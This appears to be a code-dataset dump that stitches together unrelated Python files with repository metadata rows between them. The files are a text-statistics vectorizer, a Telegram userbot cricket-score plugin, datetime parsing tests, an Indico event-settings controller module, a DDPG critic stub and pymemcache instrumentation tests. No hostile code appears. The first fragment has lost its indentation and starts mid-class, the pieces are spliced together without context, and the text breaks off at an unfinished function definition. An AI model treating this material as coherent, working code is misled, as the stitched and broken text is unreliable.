FEATURE_TYPE = TextFeatureType.DOCUMENT
def _get_shape(self) -> Tuple[int, int]:
return -1, 9
def _encode(self, doc: FeatureDocument) -> FeatureContext:
n_toks = len(doc.tokens)
n_sents = 1
min_tlen = sys.maxsize
max_tlen = 0
ave_tlen = 1
min_slen = sys.maxsize
max_slen = 0
ave_slen = 1
n_char = 0
for t in doc.tokens:
tlen = len(t.norm)
n_char += tlen
min_tlen = min(min_tlen, tlen)
max_tlen = max(max_tlen, tlen)
ave_tlen = n_char / n_toks
if isinstance(doc, FeatureDocument):
n_sents = len(doc.sents)
ave_slen = n_toks / n_sents
for s in doc.sents:
slen = len(s.tokens)
min_slen = min(min_slen, slen)
max_slen = max(max_slen, slen)
stats = (n_char, n_toks, min_tlen, max_tlen, ave_tlen,
n_sents, ave_slen, min_slen, max_slen)
arr = self.torch_config.from_iterable(stats).unsqueeze(0)
if logger.isEnabledFor(logging.DEBUG):
logger.debug(f'array shape: {arr.shape}')
return TensorFeatureContext(self.feature_id, arr)
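# Worked example: for the two-sentence document "I ran. We ate pie." (with
# punctuation tokenized separately), the encoded statistics row would be
# (n_char=14, n_toks=7, min_tlen=1, max_tlen=3, ave_tlen=2.0, n_sents=2,
# ave_slen=3.5, min_slen=3, max_slen=4).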
@dataclass
class OverlappingFeatureDocumentVectorizer(MultiDocumentVectorizer):
"""Vectorize the number of normalized and lemmatized tokens (in this order)
across multiple documents.
The input to this feature vectorizer are a tuple N of
:class:`.FeatureDocument` instances.
:shape: (2,)
"""
DESCRIPTION = 'overlapping token counts'
def _get_shape(self) -> Tuple[int, int]:
return 2,
@staticmethod
    def _norms(ac: TokensContainer, bc: TokensContainer) -> Set[str]:
a = set(map(lambda s: s.norm.lower(), ac.token_iter()))
b = set(map(lambda s: s.norm.lower(), bc.token_iter()))
return a & b
@staticmethod
    def _lemmas(ac: TokensContainer, bc: TokensContainer) -> Set[str]:
a = set(map(lambda s: s.lemma_.lower(), ac.token_iter()))
b = set(map(lambda s: s.lemma_.lower(), bc.token_iter()))
return a & b
def _encode(self, docs: Tuple[FeatureDocument]) -> FeatureContext:
norms = reduce(self._norms, docs)
lemmas = reduce(self._lemmas, docs)
arr = self.torch_config.from_iterable((len(norms), len(lemmas)))
return TensorFeatureContext(self.feature_id, arr)
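# Worked example (hypothetical documents): for "The dog ran" and "A dog runs"
# the shared lowercased norms are {"dog"} while "ran"/"runs" both lemmatize to
# "run", so the shared lemmas are {"dog", "run"}; the encoded tensor is then
# [1., 2.]. Note that the ``reduce`` calls above assume exactly two documents:
# a third document would be intersected against a plain set, which has no
# ``token_iter``.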
@dataclass
class MutualFeaturesContainerFeatureVectorizer(MultiDocumentVectorizer):
"""Vectorize the shared count of all tokens as a S X M * N tensor, where S is
the number of sentences, M is the number of token feature ids and N is the
columns of the output of the :class:`.SpacyFeatureVectorizer` vectorizer.
This uses an instance of :class:`CountEnumContainerFeatureVectorizer` to
compute across each spacy feature and then sums them up for only those
features shared. If at least one shared document has a zero count, the
features is zeroed.
The input to this feature vectorizer are a tuple of N
:class:`.TokenContainer` instances.
:shape: (|sentences|, |decoded features|,) from the referenced
:class:`CountEnumContainerFeatureVectorizer` given by
:obj:`count_vectorizer_feature_id`
"""
DESCRIPTION = 'mutual feature counts'
count_vectorizer_feature_id: str = field()
"""The string feature ID configured in the
:class:`.FeatureDocumentVectorizerManager` of the
:class:`CountEnumContainerFeatureVectorizer` to use for the count features.
"""
@property
def count_vectorizer(self) -> CountEnumContainerFeatureVectorizer:
"""Return the count vectorizer used for the count features.
:see: :obj:`count_vectorizer_feature_id`
"""
return self.manager[self.count_vectorizer_feature_id]
@property
def ones(self) -> Tensor:
"""Return a tensor of ones for the shape of this instance.
"""
return self.torch_config.ones((1, self.shape[1]))
def _get_shape(self) -> Tuple[int, int]:
return -1, self.count_vectorizer.shape[1]
def _encode(self, docs: Tuple[FeatureDocument]) -> FeatureContext:
ctxs = tuple(map(self.count_vectorizer.encode,
map(lambda doc: doc.combine_sentences(), docs)))
return MultiFeatureContext(self.feature_id, ctxs)
def _decode(self, context: MultiFeatureContext) -> Tensor:
def decode_context(ctx):
sents = self.count_vectorizer.decode(ctx)
return torch.sum(sents, axis=0)
ones = self.ones
arrs = tuple(map(decode_context, context.contexts))
if len(arrs) == 1:
# return the single document as a mutual count against itself
return arrs[0]
else:
arrs = torch.stack(arrs, axis=0).squeeze(1)
if logger.isEnabledFor(logging.DEBUG):
logger.debug(f'combined counts (doc/row): {arrs.shape}')
# clone so the operations of this vectorizer do not affect the
# tensors from the delegate count vectorizer
cnts = self.torch_config.clone(arrs)
# multiply the counts of all docs so any 0 count feature will be 0 in
# the mask
prod = cnts.prod(axis=0).unsqueeze(0)
# create 2 X N with count product with ones
cat_ones = torch.cat((prod, ones))
# keep 0 for features absent from any document, or 1 when every
# document has at least one occurrence, forming the mask
mask = torch.min(cat_ones, axis=0)[0]
if logger.isEnabledFor(logging.DEBUG):
logger.debug(f'counts mask: {cat_ones.shape}')
# use the mask to zero out counts that aren't mutual across all
# documents, then sum the counts across documents
return (cnts * mask).sum(axis=0).unsqueeze(0)
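# Illustrative sketch (not part of the original module) of the mask trick used
# in _decode above: the product of per-document count rows zeroes any feature
# with a zero count in some document, and taking the minimum against a row of
# ones caps the surviving products at 1 to form a 0/1 mask.
def _demo_mutual_mask():
    import torch
    cnts = torch.tensor([[2., 0., 1.], [3., 4., 1.]])  # 2 docs x 3 features
    prod = cnts.prod(axis=0).unsqueeze(0)              # [[6., 0., 1.]]
    mask = torch.min(torch.cat((prod, torch.ones(1, 3))), axis=0)[0]
    return (cnts * mask).sum(axis=0)                   # tensor([5., 0., 2.])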
| 39.567976
| 86
| 0.620142
|
794da1cebeb62c155689d7ab16bc98a69236d34e
| 819
|
py
|
Python
|
plugins/cricket.py
|
TeamIndianUserBot/Andencento
|
f7a4cbc8a6d5c359d04acbd5bac8c8745a5f8162
|
[
"CC0-1.0"
] | 2
|
2021-12-14T06:15:31.000Z
|
2021-12-14T12:46:04.000Z
|
plugins/cricket.py
|
Hobby-Dev-0/Andencento-1
|
2b3a01439666093445b5fa3d66cede877098fcb9
|
[
"CC0-1.0"
] | null | null | null |
plugins/cricket.py
|
Hobby-Dev-0/Andencento-1
|
2b3a01439666093445b5fa3d66cede877098fcb9
|
[
"CC0-1.0"
] | 1
|
2021-08-30T09:26:23.000Z
|
2021-08-30T09:26:23.000Z
|
import urllib.request
from bs4 import BeautifulSoup
from . import *
@Andencento.on(andencento_cmd(pattern="cs$"))
@Andencento.on(sudo_cmd(pattern="cs$", allow_sudo=True))
async def _(event):
if event.fwd_from:
return
score_page = "http://static.cricinfo.com/rss/livescores.xml"
page = urllib.request.urlopen(score_page)
soup = BeautifulSoup(page, "html.parser")
result = soup.find_all("description")
Sed = ""
for match in result:
Sed += match.get_text() + "\n\n"
await event.edit(
f"<b><u>Match information gathered successful</b></u>\n\n\n<code>{Sed}</code>",
parse_mode="HTML",
)
CmdHelp("cricket").add_command(
"cs", None, "Collects all the live cricket scores."
).add_info("Cricket Kheloge Vro?").add_warning("✅ Harmless Module.").add()
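# Standalone sketch (assumes network access; not part of the plugin): the same
# feed scrape without the Telegram plumbing, handy for testing the parsing.
def _demo_live_scores():
    import urllib.request
    from bs4 import BeautifulSoup
    page = urllib.request.urlopen("http://static.cricinfo.com/rss/livescores.xml")
    soup = BeautifulSoup(page, "html.parser")
    return "\n\n".join(m.get_text() for m in soup.find_all("description"))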
| 28.241379
| 87
| 0.661783
|
794da3eb95cf7b1b271cc3bbdba4b7f96af9b993
| 2,326
|
py
|
Python
|
tests/mal_scraper/test_mal_utils.py
|
QasimK/mal-scraper
|
2657be490c80fe695da2e774aea1602846aeb207
|
[
"MIT"
] | 17
|
2016-10-16T16:19:14.000Z
|
2022-02-11T07:46:43.000Z
|
tests/mal_scraper/test_mal_utils.py
|
QasimK/mal-scraper
|
2657be490c80fe695da2e774aea1602846aeb207
|
[
"MIT"
] | 20
|
2016-05-15T19:06:59.000Z
|
2021-06-01T21:59:28.000Z
|
tests/mal_scraper/test_mal_utils.py
|
QasimK/mal-scraper
|
2657be490c80fe695da2e774aea1602846aeb207
|
[
"MIT"
] | 11
|
2017-08-06T07:29:09.000Z
|
2022-02-07T17:03:54.000Z
|
from datetime import date, datetime, timedelta
import pytest
from mal_scraper import mal_utils
class TestGetDatetime(object):
nowish = datetime.utcnow()
yesterdayish = nowish - timedelta(days=1)
@pytest.mark.parametrize('text,expected_datetime', [
('Now', datetime.utcnow()),
('Oct 1, 2013 11:04 PM', datetime(year=2013, month=10, day=1, hour=23, minute=4)),
('Oct 1, 4:29 AM', datetime(year=nowish.year, month=10, day=1, hour=4, minute=29)),
('Yesterday, 9:58 AM', yesterdayish.replace(hour=9, minute=58)),
('Today, 1:22 AM', nowish.replace(hour=1, minute=22)),
('4 hours ago', nowish - timedelta(hours=4)),
('1 hour ago', nowish - timedelta(hours=1)),
('12 minutes ago', nowish - timedelta(minutes=12)),
('1 minute ago', nowish - timedelta(minutes=1)),
('Now', nowish),
])
def test_get_datetime(self, text, expected_datetime):
assert (expected_datetime - mal_utils.get_datetime(text)) < timedelta(minutes=1)
time_difference = mal_utils.get_datetime(text, self.nowish) - mal_utils.get_datetime(text)
assert time_difference < timedelta(minutes=1)
@pytest.mark.parametrize('text,expected_datetime', [
('Now', yesterdayish),
('Oct 1, 2013 11:04 PM', datetime(year=2013, month=9, day=30, hour=23, minute=4)),
('Oct 1, 4:29 AM', datetime(year=nowish.year, month=9, day=30, hour=4, minute=29)),
('Yesterday, 9:58 AM', yesterdayish.replace(hour=9, minute=58) - timedelta(days=1)),
('Today, 1:22 AM', yesterdayish.replace(hour=1, minute=22)),
('4 hours ago', yesterdayish - timedelta(hours=4)),
('1 hour ago', yesterdayish - timedelta(hours=1)),
('12 minutes ago', yesterdayish - timedelta(minutes=12)),
('1 minute ago', yesterdayish - timedelta(minutes=1)),
('Now', yesterdayish),
])
def test_get_datetime_relative_to_yesterday(self, text, expected_datetime):
time_difference = expected_datetime - mal_utils.get_datetime(text, self.yesterdayish)
assert time_difference < timedelta(minutes=1)
@pytest.mark.parametrize('text,expected_date', [
('Apr 3, 1998', date(year=1998, month=4, day=3))
])
    def test_get_date(self, text, expected_date):
assert expected_date == mal_utils.get_date(text)
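# Hypothetical sketch (the real mal_utils implementation may differ): the tests
# above are only deterministic because get_datetime accepts an explicit
# reference time, so relative phrases resolve against it, not the wall clock.
def _demo_relative_parse(text, now=None):
    import re
    now = now or datetime.utcnow()
    match = re.match(r'(\d+) (minute|hour)s? ago', text)
    if match:
        amount, unit = int(match.group(1)), match.group(2)
        return now - timedelta(**{unit + 's': amount})
    return now  # 'Now' and anything unrecognised falls back to the reference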
| 43.886792
| 98
| 0.654772
|
794da437ac98e144b5c50b10d4f26b6288407928
| 336
|
py
|
Python
|
brl_baselines/qmdp_ddpg/models.py
|
gilwoolee/brl_baselines
|
c85df28c0f2dfbd69d3d27928bcbabf36a3663bb
|
[
"BSD-3-Clause"
] | null | null | null |
brl_baselines/qmdp_ddpg/models.py
|
gilwoolee/brl_baselines
|
c85df28c0f2dfbd69d3d27928bcbabf36a3663bb
|
[
"BSD-3-Clause"
] | null | null | null |
brl_baselines/qmdp_ddpg/models.py
|
gilwoolee/brl_baselines
|
c85df28c0f2dfbd69d3d27928bcbabf36a3663bb
|
[
"BSD-3-Clause"
] | null | null | null |
import tensorflow as tf
from baselines.common.models import get_network_builder
from baselines.ddpg.models import Critic, Model
class PretrainableCritic(Model):
def __init__(self, name='critic', network='mlp', **network_kwargs):
super().__init__(name=name, network=network, **network_kwargs)
self.layer_norm = True
| 37.333333
| 71
| 0.755952
|
794da486a5b1af44c2de5f729dca6317ea8a8f80
| 6,613
|
py
|
Python
|
indico/modules/events/management/controllers/settings.py
|
jgrigera/indico
|
b5538f2755bc38a02313d079bac831ee3dfb44ab
|
[
"MIT"
] | 1
|
2018-11-12T21:29:26.000Z
|
2018-11-12T21:29:26.000Z
|
indico/modules/events/management/controllers/settings.py
|
jgrigera/indico
|
b5538f2755bc38a02313d079bac831ee3dfb44ab
|
[
"MIT"
] | 9
|
2020-09-08T09:25:57.000Z
|
2022-01-13T02:59:05.000Z
|
indico/modules/events/management/controllers/settings.py
|
jgrigera/indico
|
b5538f2755bc38a02313d079bac831ee3dfb44ab
|
[
"MIT"
] | 3
|
2020-07-20T09:09:44.000Z
|
2020-10-19T00:29:49.000Z
|
# This file is part of Indico.
# Copyright (C) 2002 - 2020 CERN
#
# Indico is free software; you can redistribute it and/or
# modify it under the terms of the MIT License; see the
# LICENSE file for more details.
from __future__ import unicode_literals
from flask import redirect, session
from werkzeug.exceptions import Forbidden
from indico.core import signals
from indico.core.config import config
from indico.core.db import db
from indico.core.db.sqlalchemy.util.queries import db_dates_overlap
from indico.modules.events.management.controllers.base import RHManageEventBase
from indico.modules.events.management.forms import (EventClassificationForm, EventContactInfoForm, EventDataForm,
EventDatesForm, EventLocationForm, EventPersonsForm)
from indico.modules.events.management.util import flash_if_unregistered
from indico.modules.events.management.views import WPEventSettings, render_event_management_header_right
from indico.modules.events.models.labels import EventLabel
from indico.modules.events.models.references import ReferenceType
from indico.modules.events.operations import update_event
from indico.modules.events.util import track_time_changes
from indico.modules.rb.models.reservation_occurrences import ReservationOccurrence
from indico.modules.rb.models.reservations import Reservation
from indico.modules.rb.models.rooms import Room
from indico.util.signals import values_from_signal
from indico.web.flask.templating import get_template_module
from indico.web.forms.base import FormDefaults
from indico.web.util import jsonify_data, jsonify_form, jsonify_template
class RHEventSettings(RHManageEventBase):
"""Event settings dashboard"""
def _check_access(self):
if not session.user:
raise Forbidden
# If the user cannot manage the whole event see if anything gives them
# limited management access.
if not self.event.can_manage(session.user):
urls = sorted(values_from_signal(signals.event_management.management_url.send(self.event),
single_value=True))
response = redirect(urls[0]) if urls else None
raise Forbidden(response=response)
RHManageEventBase._check_access(self) # mainly to trigger the legacy "event locked" check
def _process(self):
show_booking_warning = False
if (config.ENABLE_ROOMBOOKING and not self.event.has_ended and self.event.room
and not self.event.room_reservation_links):
# Check if any of the managers of the event already have a booking that overlaps with the event datetime
manager_ids = [p.user.id for p in self.event.acl_entries if p.user]
has_overlap = (ReservationOccurrence.query
.filter(ReservationOccurrence.is_valid,
db.or_(Reservation.booked_for_id.in_(manager_ids),
Reservation.created_by_id.in_(manager_ids)),
db_dates_overlap(ReservationOccurrence,
'start_dt', self.event.start_dt_local,
'end_dt', self.event.end_dt_local),
Reservation.room_id == self.event.room.id,
~Room.is_deleted)
.join(Reservation)
.join(Room)
.has_rows())
show_booking_warning = not has_overlap
has_reference_types = ReferenceType.query.has_rows()
has_event_labels = EventLabel.query.has_rows()
return WPEventSettings.render_template('settings.html', self.event, 'settings',
show_booking_warning=show_booking_warning,
has_reference_types=has_reference_types,
has_event_labels=has_event_labels)
class RHEditEventDataBase(RHManageEventBase):
form_class = None
section_name = None
def render_form(self, form):
return jsonify_form(form, footer_align_right=True)
def render_settings_box(self):
tpl = get_template_module('events/management/_settings.html')
assert self.section_name
has_reference_types = ReferenceType.query.has_rows()
has_event_labels = EventLabel.query.has_rows()
return tpl.render_event_settings(self.event, has_reference_types, has_event_labels,
section=self.section_name, with_container=False)
def jsonify_success(self):
return jsonify_data(settings_box=self.render_settings_box(),
right_header=render_event_management_header_right(self.event))
def _process(self):
form = self.form_class(obj=self.event, event=self.event)
if form.validate_on_submit():
with flash_if_unregistered(self.event, lambda: self.event.person_links):
update_event(self.event, **form.data)
return self.jsonify_success()
self.commit = False
return self.render_form(form)
class RHEditEventData(RHEditEventDataBase):
form_class = EventDataForm
section_name = 'data'
class RHEditEventLocation(RHEditEventDataBase):
form_class = EventLocationForm
section_name = 'location'
class RHEditEventPersons(RHEditEventDataBase):
form_class = EventPersonsForm
section_name = 'persons'
class RHEditEventContactInfo(RHEditEventDataBase):
form_class = EventContactInfoForm
section_name = 'contact_info'
def render_form(self, form):
return jsonify_template('events/management/event_contact_info.html', form=form)
class RHEditEventClassification(RHEditEventDataBase):
form_class = EventClassificationForm
section_name = 'classification'
class RHEditEventDates(RHEditEventDataBase):
section_name = 'dates'
def _process(self):
defaults = FormDefaults(self.event, update_timetable=True)
form = EventDatesForm(obj=defaults, event=self.event)
if form.validate_on_submit():
with track_time_changes():
update_event(self.event, **form.data)
return self.jsonify_success()
show_screen_dates = form.has_displayed_dates and (form.start_dt_override.data or form.end_dt_override.data)
return jsonify_template('events/management/event_dates.html', form=form, show_screen_dates=show_screen_dates)
| 44.986395
| 117
| 0.683956
|
794da53f7f918ffd128d0cb789377a770123133a
| 174
|
py
|
Python
|
VSR/Backend/Torch/Framework/__init__.py
|
Kadantte/VideoSuperResolution
|
4c86e49d81c7a9bea1fe0780d651afc126768df3
|
[
"MIT"
] | 1,447
|
2018-06-04T08:44:07.000Z
|
2022-03-29T06:19:10.000Z
|
VSR/Backend/Torch/Framework/__init__.py
|
AbdulMoqeet/VideoSuperResolution
|
82c3347554561ff9dfb5e86d9cf0a55239ca662e
|
[
"MIT"
] | 96
|
2018-08-29T01:02:45.000Z
|
2022-01-12T06:00:01.000Z
|
VSR/Backend/Torch/Framework/__init__.py
|
AbdulMoqeet/VideoSuperResolution
|
82c3347554561ff9dfb5e86d9cf0a55239ca662e
|
[
"MIT"
] | 307
|
2018-06-26T13:35:54.000Z
|
2022-01-21T09:01:54.000Z
|
# Copyright (c) 2017-2020 Wenyi Tang.
# Author: Wenyi Tang
# Email: wenyitang@outlook.com
# Update: 2020 - 2 - 7
__all__ = [
'Environment',
'Summary',
'Trainer'
]
| 15.818182
| 38
| 0.632184
|
794da6d9e7c9bd55147f0996c0b51b7bb9cec19b
| 165
|
py
|
Python
|
faebryk/__init__.py
|
NoR8quoh1r/faebryk
|
9d0b2c20bc933d18f2f7124e69032fe308ab41bc
|
[
"MIT"
] | null | null | null |
faebryk/__init__.py
|
NoR8quoh1r/faebryk
|
9d0b2c20bc933d18f2f7124e69032fe308ab41bc
|
[
"MIT"
] | null | null | null |
faebryk/__init__.py
|
NoR8quoh1r/faebryk
|
9d0b2c20bc933d18f2f7124e69032fe308ab41bc
|
[
"MIT"
] | null | null | null |
# This file is part of the faebryk project
# SPDX-License-Identifier: MIT
import faebryk.exporters
import faebryk.libs
import faebryk.library
import faebryk.version
| 23.571429
| 42
| 0.824242
|
794da9972be25bd22bee5901b20d4324d6b15699
| 17,007
|
py
|
Python
|
instrumentation/opentelemetry-instrumentation-pymemcache/tests/test_pymemcache.py
|
LetzNico/opentelemetry-python
|
b565d6b643f175faee3f57ef81c8b7edbf50ec41
|
[
"Apache-2.0"
] | null | null | null |
instrumentation/opentelemetry-instrumentation-pymemcache/tests/test_pymemcache.py
|
LetzNico/opentelemetry-python
|
b565d6b643f175faee3f57ef81c8b7edbf50ec41
|
[
"Apache-2.0"
] | null | null | null |
instrumentation/opentelemetry-instrumentation-pymemcache/tests/test_pymemcache.py
|
LetzNico/opentelemetry-python
|
b565d6b643f175faee3f57ef81c8b7edbf50ec41
|
[
"Apache-2.0"
] | null | null | null |
# Copyright The OpenTelemetry Authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import pymemcache
from pymemcache.exceptions import (
MemcacheClientError,
MemcacheIllegalInputError,
MemcacheServerError,
MemcacheUnknownCommandError,
MemcacheUnknownError,
)
from opentelemetry import trace as trace_api
from opentelemetry.instrumentation.pymemcache import PymemcacheInstrumentor
from opentelemetry.test.test_base import TestBase
from opentelemetry.trace import get_tracer
from opentelemetry.trace.status import StatusCanonicalCode
from .utils import MockSocket, _str
TEST_HOST = "localhost"
TEST_PORT = 117711
class PymemcacheClientTestCase(
TestBase
): # pylint: disable=too-many-public-methods
""" Tests for a patched pymemcache.client.base.Client. """
def setUp(self):
super().setUp()
PymemcacheInstrumentor().instrument()
# pylint: disable=protected-access
self.tracer = get_tracer(__name__)
def tearDown(self):
super().tearDown()
PymemcacheInstrumentor().uninstrument()
def make_client(self, mock_socket_values, **kwargs):
# pylint: disable=attribute-defined-outside-init
self.client = pymemcache.client.base.Client(
(TEST_HOST, TEST_PORT), **kwargs
)
self.client.sock = MockSocket(list(mock_socket_values))
return self.client
def check_spans(self, spans, num_expected, queries_expected):
"""A helper for validating basic span information."""
self.assertEqual(num_expected, len(spans))
for span, query in zip(spans, queries_expected):
self.assertEqual(span.name, "memcached.command")
self.assertIs(span.kind, trace_api.SpanKind.INTERNAL)
self.assertEqual(
span.attributes["net.peer.name"], "{}".format(TEST_HOST)
)
self.assertEqual(span.attributes["net.peer.port"], TEST_PORT)
self.assertEqual(span.attributes["db.type"], "memcached")
self.assertEqual(
span.attributes["db.url"],
"memcached://{}:{}".format(TEST_HOST, TEST_PORT),
)
self.assertEqual(span.attributes["db.statement"], query)
def test_set_success(self):
client = self.make_client([b"STORED\r\n"])
result = client.set(b"key", b"value", noreply=False)
self.assertTrue(result)
spans = self.memory_exporter.get_finished_spans()
self.check_spans(spans, 1, ["set key"])
def test_get_many_none_found(self):
client = self.make_client([b"END\r\n"])
result = client.get_many([b"key1", b"key2"])
assert result == {}
spans = self.memory_exporter.get_finished_spans()
self.check_spans(spans, 1, ["get_many key1 key2"])
def test_get_multi_none_found(self):
client = self.make_client([b"END\r\n"])
# alias for get_many
result = client.get_multi([b"key1", b"key2"])
assert result == {}
spans = self.memory_exporter.get_finished_spans()
self.check_spans(spans, 1, ["get_multi key1 key2"])
def test_set_multi_success(self):
client = self.make_client([b"STORED\r\n"])
        # Alias for set_many, a convenience function that calls set for every key
result = client.set_multi({b"key": b"value"}, noreply=False)
self.assertTrue(result)
spans = self.memory_exporter.get_finished_spans()
self.check_spans(spans, 2, ["set key", "set_multi key"])
def test_delete_not_found(self):
client = self.make_client([b"NOT_FOUND\r\n"])
result = client.delete(b"key", noreply=False)
assert result is False
spans = self.memory_exporter.get_finished_spans()
self.check_spans(spans, 1, ["delete key"])
def test_incr_found(self):
client = self.make_client([b"STORED\r\n", b"1\r\n"])
client.set(b"key", 0, noreply=False)
result = client.incr(b"key", 1, noreply=False)
assert result == 1
spans = self.memory_exporter.get_finished_spans()
self.check_spans(spans, 2, ["set key", "incr key"])
def test_get_found(self):
client = self.make_client(
[b"STORED\r\n", b"VALUE key 0 5\r\nvalue\r\nEND\r\n"]
)
result = client.set(b"key", b"value", noreply=False)
result = client.get(b"key")
assert result == b"value"
spans = self.memory_exporter.get_finished_spans()
self.check_spans(spans, 2, ["set key", "get key"])
def test_decr_found(self):
client = self.make_client([b"STORED\r\n", b"1\r\n"])
client.set(b"key", 2, noreply=False)
result = client.decr(b"key", 1, noreply=False)
assert result == 1
spans = self.memory_exporter.get_finished_spans()
self.check_spans(spans, 2, ["set key", "decr key"])
def test_add_stored(self):
client = self.make_client([b"STORED\r", b"\n"])
result = client.add(b"key", b"value", noreply=False)
self.assertTrue(result)
spans = self.memory_exporter.get_finished_spans()
self.check_spans(spans, 1, ["add key"])
def test_delete_many_found(self):
client = self.make_client([b"STORED\r", b"\n", b"DELETED\r\n"])
result = client.add(b"key", b"value", noreply=False)
        # a convenience function that calls delete for every key
result = client.delete_many([b"key"], noreply=False)
self.assertTrue(result)
spans = self.memory_exporter.get_finished_spans()
self.check_spans(
spans, 3, ["add key", "delete key", "delete_many key"]
)
def test_set_many_success(self):
client = self.make_client([b"STORED\r\n"])
        # a convenience function that calls set for every key
result = client.set_many({b"key": b"value"}, noreply=False)
self.assertTrue(result)
spans = self.memory_exporter.get_finished_spans()
self.check_spans(spans, 2, ["set key", "set_many key"])
def test_set_get(self):
client = self.make_client(
[b"STORED\r\n", b"VALUE key 0 5\r\nvalue\r\nEND\r\n"]
)
client.set(b"key", b"value", noreply=False)
result = client.get(b"key")
assert _str(result) == "value"
spans = self.memory_exporter.get_finished_spans()
self.assertEqual(len(spans), 2)
self.assertEqual(
spans[0].attributes["db.url"],
"memcached://{}:{}".format(TEST_HOST, TEST_PORT),
)
def test_append_stored(self):
client = self.make_client([b"STORED\r\n"])
result = client.append(b"key", b"value", noreply=False)
self.assertTrue(result)
spans = self.memory_exporter.get_finished_spans()
self.check_spans(spans, 1, ["append key"])
def test_prepend_stored(self):
client = self.make_client([b"STORED\r\n"])
result = client.prepend(b"key", b"value", noreply=False)
self.assertTrue(result)
spans = self.memory_exporter.get_finished_spans()
self.check_spans(spans, 1, ["prepend key"])
def test_cas_stored(self):
client = self.make_client([b"STORED\r\n"])
result = client.cas(b"key", b"value", b"cas", noreply=False)
self.assertTrue(result)
spans = self.memory_exporter.get_finished_spans()
self.check_spans(spans, 1, ["cas key"])
def test_cas_exists(self):
client = self.make_client([b"EXISTS\r\n"])
result = client.cas(b"key", b"value", b"cas", noreply=False)
assert result is False
spans = self.memory_exporter.get_finished_spans()
self.check_spans(spans, 1, ["cas key"])
def test_cas_not_found(self):
client = self.make_client([b"NOT_FOUND\r\n"])
result = client.cas(b"key", b"value", b"cas", noreply=False)
assert result is None
spans = self.memory_exporter.get_finished_spans()
self.check_spans(spans, 1, ["cas key"])
def test_delete_exception(self):
client = self.make_client([Exception("fail")])
def _delete():
client.delete(b"key", noreply=False)
with self.assertRaises(Exception):
_delete()
spans = self.memory_exporter.get_finished_spans()
span = spans[0]
self.assertNotEqual(span.status.canonical_code, StatusCanonicalCode.OK)
self.check_spans(spans, 1, ["delete key"])
def test_flush_all(self):
client = self.make_client([b"OK\r\n"])
result = client.flush_all(noreply=False)
self.assertTrue(result)
spans = self.memory_exporter.get_finished_spans()
self.check_spans(spans, 1, ["flush_all"])
def test_incr_exception(self):
client = self.make_client([Exception("fail")])
def _incr():
client.incr(b"key", 1)
with self.assertRaises(Exception):
_incr()
spans = self.memory_exporter.get_finished_spans()
span = spans[0]
self.assertNotEqual(span.status.canonical_code, StatusCanonicalCode.OK)
self.check_spans(spans, 1, ["incr key"])
def test_get_error(self):
client = self.make_client([b"ERROR\r\n"])
def _get():
client.get(b"key")
with self.assertRaises(MemcacheUnknownCommandError):
_get()
spans = self.memory_exporter.get_finished_spans()
span = spans[0]
self.assertNotEqual(span.status.canonical_code, StatusCanonicalCode.OK)
self.check_spans(spans, 1, ["get key"])
def test_get_unknown_error(self):
client = self.make_client([b"foobarbaz\r\n"])
def _get():
client.get(b"key")
with self.assertRaises(MemcacheUnknownError):
_get()
spans = self.memory_exporter.get_finished_spans()
span = spans[0]
self.assertNotEqual(span.status.canonical_code, StatusCanonicalCode.OK)
self.check_spans(spans, 1, ["get key"])
def test_gets_found(self):
client = self.make_client([b"VALUE key 0 5 10\r\nvalue\r\nEND\r\n"])
result = client.gets(b"key")
assert result == (b"value", b"10")
spans = self.memory_exporter.get_finished_spans()
self.check_spans(spans, 1, ["gets key"])
def test_touch_not_found(self):
client = self.make_client([b"NOT_FOUND\r\n"])
result = client.touch(b"key", noreply=False)
assert result is False
spans = self.memory_exporter.get_finished_spans()
self.check_spans(spans, 1, ["touch key"])
def test_set_client_error(self):
client = self.make_client([b"CLIENT_ERROR some message\r\n"])
def _set():
client.set("key", "value", noreply=False)
with self.assertRaises(MemcacheClientError):
_set()
spans = self.memory_exporter.get_finished_spans()
span = spans[0]
self.assertNotEqual(span.status.canonical_code, StatusCanonicalCode.OK)
self.check_spans(spans, 1, ["set key"])
def test_set_server_error(self):
client = self.make_client([b"SERVER_ERROR some message\r\n"])
def _set():
client.set(b"key", b"value", noreply=False)
with self.assertRaises(MemcacheServerError):
_set()
spans = self.memory_exporter.get_finished_spans()
span = spans[0]
self.assertNotEqual(span.status.canonical_code, StatusCanonicalCode.OK)
self.check_spans(spans, 1, ["set key"])
def test_set_key_with_space(self):
client = self.make_client([b""])
def _set():
client.set(b"key has space", b"value", noreply=False)
with self.assertRaises(MemcacheIllegalInputError):
_set()
spans = self.memory_exporter.get_finished_spans()
span = spans[0]
self.assertNotEqual(span.status.canonical_code, StatusCanonicalCode.OK)
self.check_spans(spans, 1, ["set key has space"])
def test_quit(self):
client = self.make_client([])
assert client.quit() is None
spans = self.memory_exporter.get_finished_spans()
self.check_spans(spans, 1, ["quit"])
def test_replace_not_stored(self):
client = self.make_client([b"NOT_STORED\r\n"])
result = client.replace(b"key", b"value", noreply=False)
assert result is False
spans = self.memory_exporter.get_finished_spans()
self.check_spans(spans, 1, ["replace key"])
def test_version_success(self):
client = self.make_client(
[b"VERSION 1.2.3\r\n"], default_noreply=False
)
result = client.version()
assert result == b"1.2.3"
spans = self.memory_exporter.get_finished_spans()
self.check_spans(spans, 1, ["version"])
def test_stats(self):
client = self.make_client([b"STAT fake_stats 1\r\n", b"END\r\n"])
result = client.stats()
assert client.sock.send_bufs == [b"stats \r\n"]
assert result == {b"fake_stats": 1}
spans = self.memory_exporter.get_finished_spans()
self.check_spans(spans, 1, ["stats"])
def test_uninstrumented(self):
PymemcacheInstrumentor().uninstrument()
client = self.make_client(
[b"STORED\r\n", b"VALUE key 0 5\r\nvalue\r\nEND\r\n"]
)
client.set(b"key", b"value", noreply=False)
result = client.get(b"key")
assert _str(result) == "value"
spans = self.memory_exporter.get_finished_spans()
self.assertEqual(len(spans), 0)
PymemcacheInstrumentor().instrument()
class PymemcacheHashClientTestCase(TestBase):
""" Tests for a patched pymemcache.client.hash.HashClient. """
def setUp(self):
super().setUp()
PymemcacheInstrumentor().instrument()
# pylint: disable=protected-access
self.tracer = get_tracer(__name__)
def tearDown(self):
super().tearDown()
PymemcacheInstrumentor().uninstrument()
def make_client_pool(
